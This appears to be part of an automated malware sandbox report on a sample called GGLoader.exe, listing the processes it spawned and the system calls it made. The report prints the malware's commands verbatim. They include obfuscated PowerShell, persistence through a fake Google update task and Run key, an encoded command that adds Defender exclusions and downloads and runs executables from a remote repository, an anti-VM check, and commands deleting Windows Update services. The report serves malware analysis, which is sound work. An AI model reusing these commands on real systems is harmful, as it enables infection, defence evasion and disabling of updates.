                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe "function local:nglbonfbsunr{param([outputtype([type])][parameter(position=0)][type[]]$qtvyipwnfcficq,[parameter(position=1)][type]$hhlnovedyw)$dpttuehyisd=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+'r'+''+[char](101)+''+[char](102)+''+[char](108)+''+[char](101)+''+[char](99)+''+'t'+''+[char](101)+''+'d'+''+[char](68)+'e'+[char](108)+''+'e'+''+[char](103)+'a'+'t'+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule(''+'i'+''+[char](110)+''+[char](77)+'em'+[char](111)+''+[char](114)+''+[char](121)+'m'+'o'+''+[char](100)+'u'+[char](108)+'e',$false).definetype(''+[char](77)+'yd'+'e'+'l'+[char](101)+''+'g'+'at'+'e'+''+'t'+''+[char](121)+''+'p'+''+[char](101)+'',''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+''+[char](115)+''+[char](44)+'p'+[char](117)+''+'b'+''+[char](108)+'ic'+[char](44)+''+[char](83)+''+[char](101)+'ale'+[char](100)+''+[char](44)+''+[char](65)+''+'n'+''+[char](115)+'i'+'c'+''+'l'+''+[char](97)+''+[char](115)+''+[char](115)+''+[char](44)+''+'a'+''+[char](117)+''+[char](116)+'o'+[char](67)+''+[char](108)+''+[char](97)+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$dpttuehyisd.defineconstructor(''+[char](82)+''+'t'+''+'s'+''+[char](112)+''+[char](101)+''+'c'+''+[char](105)+''+[char](97)+''+'l'+''+[char](78)+''+[char](97)+''+'m'+'e,'+[char](72)+'ide'+'b'+'y'+'s'+''+'i'+''+[char](103)+''+','+'p'+[char](117)+''+'b'+'l'+'i'+''+[char](99)+'',[reflection.callingconventions]::standard,$qtvyipwnfcficq).setimplementationflags(''+[char](82)+''+[char](117)+'nt'+[char](105)+'m'+[char](101)+''+[char](44)+''+[char](77)+''+'a'+'n'+[char](97)+''+[char](103)+'e'+[char](100)+'');$dpttuehyisd.definemethod('i'+[char](110)+''+[char](118)+''+'o'+''+[char](107)+''+'e'+'',''+[char](80)+''+[char](117)+''+[char](98)+'l'+'i'+''+'c'+''+[char](44)+''+[char](72)+''+[char](105)+''+[char](100)+'e'+[char](66)+'y'+'s'+''+[char](105)+'g'+[char](44)+'n'+'e'+'w'+[char](83)+''+[char](108)+''+[char](111)+''+'t'+''+[char](44)+''+[char](86)+''+[char](105)+''+'r'+''+[char](116)+''+'u'+''+[char](97)+''+'l'+'',$hhlnovedyw,$qtvyipwnfcficq).setimplementationflags('r'+[char](117)+''+[char](110)+''+[char](116)+''+[char](105)+''+[char](109)+''+[char](101)+''+','+''+[char](77)+''+'a'+''+'n'+''+'a'+''+[char](103)+''+[char](101)+''+'d'+'');write-output $dpttuehyisd.createtype();}$fxvcjurjeeuct=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+'s'+''+[char](121)+''+[char](115)+''+'t'+''+[char](101)+'m'+'.'+''+[char](100)+''+[char](108)+''+'l'+'')}).gettype('m'+'i'+''+[char](99)+''+[char](114)+''+[char](111)+''+'s'+'o'+'f'+'t'+'.'+''+'w'+''+[char](105)+''+'n'+''+[char](51)+''+'2'+''+[char](46)+''+'u'+'n'+[char](115)+''+[char](97)+''+[char](102)+''+[char](101)+'f'+'x'+''+[char](118)+'c'+[char](106)+''+'u'+''+[char](
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe "function local:qgcytqphzuyk{param([outputtype([type])][parameter(position=0)][type[]]$mpiggxnlyyxmmn,[parameter(position=1)][type]$ykftymbqtb)$nmulmondbgm=[appdomain]::currentdomain.definedynamicassembly((new-object reflection.assemblyname(''+[char](82)+''+[char](101)+'f'+'l'+'e'+'c'+''+'t'+'e'+[char](100)+'d'+[char](101)+''+[char](108)+'e'+'g'+''+[char](97)+''+[char](116)+''+[char](101)+'')),[reflection.emit.assemblybuilderaccess]::run).definedynamicmodule('i'+[char](110)+''+[char](77)+''+[char](101)+''+'m'+'or'+[char](121)+''+[char](77)+''+[char](111)+''+'d'+'u'+[char](108)+''+'e'+'',$false).definetype(''+[char](77)+''+'y'+''+[char](68)+''+[char](101)+'le'+[char](103)+''+[char](97)+''+'t'+''+[char](101)+''+[char](84)+''+'y'+'p'+[char](101)+'',''+[char](67)+''+'l'+''+[char](97)+''+[char](115)+'s'+[char](44)+''+[char](80)+''+[char](117)+''+[char](98)+'li'+'c'+''+','+'s'+[char](101)+''+'a'+''+[char](108)+'ed,a'+[char](110)+'s'+[char](105)+''+[char](67)+''+[char](108)+''+'a'+''+[char](115)+'s'+[char](44)+''+[char](65)+''+'u'+''+[char](116)+''+[char](111)+''+[char](67)+''+'l'+''+'a'+''+[char](115)+''+[char](115)+'',[multicastdelegate]);$nmulmondbgm.defineconstructor(''+[char](82)+'t'+[char](83)+''+'p'+''+[char](101)+''+'c'+''+[char](105)+''+'a'+''+'l'+''+[char](78)+''+[char](97)+'me'+[char](44)+''+[char](72)+''+'i'+''+[char](100)+''+'e'+''+[char](66)+''+[char](121)+'si'+[char](103)+''+','+''+[char](80)+''+[char](117)+''+'b'+''+[char](108)+'i'+[char](99)+'',[reflection.callingconventions]::standard,$mpiggxnlyyxmmn).setimplementationflags(''+'r'+'u'+[char](110)+'t'+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+''+'m'+''+[char](97)+'n'+[char](97)+''+'g'+''+'e'+''+[char](100)+'');$nmulmondbgm.definemethod(''+[char](73)+''+[char](110)+''+[char](118)+''+[char](111)+''+'k'+''+[char](101)+'',''+[char](80)+''+[char](117)+'b'+[char](108)+'i'+[char](99)+','+[char](72)+''+'i'+''+[char](100)+''+[char](101)+''+[char](66)+'y'+[char](83)+'ig'+[char](44)+''+[char](78)+''+[char](101)+''+[char](119)+'s'+[char](108)+'ot'+[char](44)+'v'+[char](105)+'r'+'t'+'u'+[char](97)+''+[char](108)+'',$ykftymbqtb,$mpiggxnlyyxmmn).setimplementationflags(''+[char](82)+''+[char](117)+''+[char](110)+''+'t'+''+[char](105)+''+[char](109)+''+[char](101)+''+[char](44)+'m'+'a'+''+[char](110)+''+'a'+''+'g'+''+[char](101)+'d');write-output $nmulmondbgm.createtype();}$mrsnzvuswjbnm=([appdomain]::currentdomain.getassemblies()|where-object{$_.globalassemblycache -and $_.location.split('\')[-1].equals(''+[char](83)+''+[char](121)+''+[char](115)+''+[char](116)+''+[char](101)+''+[char](109)+'.d'+[char](108)+'l')}).gettype('mi'+[char](99)+''+'r'+''+[char](111)+''+[char](115)+''+[char](111)+''+'f'+''+[char](116)+''+'.'+''+'w'+''+'i'+''+'n'+'3'+[char](50)+'.'+'u'+''+[char](110)+''+[char](115)+''+[char](97)+''+[char](102)+'emr'+[char](115)+''+[char](78)+''+[char](90)+''+'v'+''+[
                        Source: C:\Users\user\Desktop\GGLoader.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand "paajagcacgb4acmapgbtahqayqbyahqalqbqahiabwbjaguacwbzacaacabvahcazqbyahmaaablagwabaagac0avwbpag4azabvahcauwb0ahkabablacaasabpagqazablag4aiaataeeacgbnahuabqblag4adabmagkacwb0acaaigbbagqazaatafqaeqbwaguaiaataeeacwbzaguabqbiagwaeqboageabqblacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsapaajag4adqbzacmapgbbafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwauae0azqbzahmayqbnaguaqgbvahgaxqa6adoauwboag8adwaoaccatgbvacaavgbpahiadab1ageabaagae0ayqbjaggaaqbuagualwbtaguacgb2aguacgagagkacwagageababsag8adwblagqaiqagafqacgb5acaacgb1ag4abgbpag4azwagag8abgagageaiabkagkazgbmaguacgblag4adaagagqazqb2agkaywblaceajwasaccajwasaccatwblaccalaanaeuacgbyag8acganackapaajahcaawbracmapga7aciaowa8acmazqbmahiaiwa+acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagadwaiwbmahaazwajad4aiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabaacgajablag4adga6afuacwblahiauabyag8azgbpagwazqasacqazqbuahyaogbtahkacwb0aguabqbeahiaaqb2aguakqagadwaiwbuahoaaaajad4aiaataeyabwbyagmazqagadwaiwbhaheazaajad4aowaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavaduaoqa0adaaagbnadkaoaazadqalwbnagyamwa0adqamwbmadmalwbyageadwavadaayqbkagyayqblagyanabmadganaa3ageamqa3aguayqa0aguanabmadyanqa2agqaywbkadganqbladcangayadkamwa3adgamablagqalwbeac4azqb4aguajwasacaapaajahaaagb4acmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmadgbjahkaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmaeqbjahkaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmazqbuahmazqbhaguadaauaguaeablaccakqapadwaiwbiagcaawajad4aowagacgatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaapac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaanaggadab0ahaacwa6ac8alwbiagkadabiahuaywbraguadaauag8acgbnac8acgblagmaaablageadabzag8acgbnac8acgblagmaaablageadabzagqaaqbyaguaywb0ac8acgbhahcalwawadaazqbiadiazaawagianaazadyanqa5adeazgbjaguamqaxaduamwbiageaywbhadcangayaduamaa5aguanwa2adiazgayagmazqa0ac8aqwbmafaalgblahgazqanacwaiaa8acmacwbiagqaiwa+acaakabkag8aaqbuac0auabhahqaaaagadwaiwboaheadqajad4aiaatafaayqb0aggaiaakaguabgb2adoavablag0acaagadwaiwbrahcacwajad4aiaataemaaabpagwazabqageadaboacaajwbmagkaywbdaggazqbjagsalgblahgazqanackakqa8acmaawbpahgaiwa+adsaiaaoae4azqb3ac0atwbiagoazqbjahqaiabtahkacwb0aguabqauae4azqb0ac4avwblagiaqwbsagkazqbuahqakqauaeqabwb3ag4ababvageazabgagkabablacgajwboahqadabwahmaogavac8aygbpahqaygb1agmaawblahqalgbvahiazwavahiazqbjaggazqbhahqacwbvahiazwavahiazqbjaggazqbhahqacwbkagkacgblagmadaavahiayqb3ac8amaawaguaygayagqamabiadqamwa2aduaoqaxagyaywbladeamqa1admaygbhagmayqa3adyamga1adaaoqbladcangayagyamgbjaguanaavaeqazqb2ag0aaqbuac4azqb4aguajwasacaapaajagqadqbxacmapgagacgasgbvagkabgatafaayqb0aggaiaa8acmaaaboahqaiwa+acaalqbqageadaboacaajablag4adga6afqazqbtahaaiaa8acmadqbzahiaiwa+acaalqbdaggaaqbsagqauabhahqaaaagaccatabpagmauwblag4azaauaguaeablaccakqapadwaiwboahcabJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" add-type -assemblyname system.windows.forms;<#nus#>[system.windows.forms.messagebox]::show('no virtual machine/server is allowed! try running on a different device!','','ok','error')<#wkk#>; Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c sc stop usosvc & sc stop waasmedicsvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "hklm\system\currentcontrolset\services\usosvc" /f & reg delete "hklm\system\currentcontrolset\services\waasmedicsvc" /f & reg delete "hklm\system\currentcontrolset\services\wuauserv" /f & reg delete "hklm\system\currentcontrolset\services\bits" /f & reg delete "hklm\system\currentcontrolset\services\dosvc" /fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\LicSend.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ncotqmia#> if((new-object security.principal.windowsprincipal([security.principal.windowsidentity]::getcurrent())).isinrole([security.principal.windowsbuiltinrole]::administrator)) { if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'system' /tn 'googleupdatetaskmachineqc' /tr '''c:\program files\google\chrome\updater.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\program files\google\chrome\updater.exe') -trigger (new-scheduledtasktrigger -atstartup) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'googleupdatetaskmachineqc' -user 'system' -runlevel 'highest' -force; } } else { reg add "hkcu\software\microsoft\windows\currentversion\run" /v "googleupdatetaskmachineqc" /t reg_sz /f /d 'c:\program files\google\chrome\updater.exe' }Jump to behavior
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,42_2_0000000140001C64
                        Source: C:\Windows\System32\dllhost.exeCode function: 42_2_0000000140001C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,42_2_0000000140001C64
                        Source: dwm.exe, 0000002E.00000002.2994797055.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 0000002E.00000000.2235418179.000002BAA7B6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                        Source: winlogon.exe, 0000002B.00000000.2219013843.00000225DCB71000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 0000002B.00000002.2969652088.00000225DCB70000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000002E.00000000.2236251350.000002BAA8051000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: 6_2_007A5815 cpuid 6_2_007A5815
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD13B
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007B51E1
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD186
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007BD221
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,6_2_007BD2AC
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007BD4FF
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_007BD628
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetLocaleInfoW,6_2_007BD72E
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_007BD7FD
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: EnumSystemLocalesW,6_2_007B4CBB
                        Source: C:\Users\user\AppData\Local\Temp\LicCheck.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,6_2_007BCE99
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C051E1
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D186
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D13B
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,35_2_00C0D2AC
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C0D221
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C0D4FF
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,35_2_00C0D628
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,35_2_00C0D7FD
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: GetLocaleInfoW,35_2_00C0D72E
                        Source: C:\Users\user\AppData\Roaming\Win32Sync\svcupdater.exeCode function: EnumSystemLocalesW,35_2_00C04CBB
                        Source: C:\Users\user\Desktop\GGLoader.exeQueries volume information: C:\Users\user\Desktop\GGLoader.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
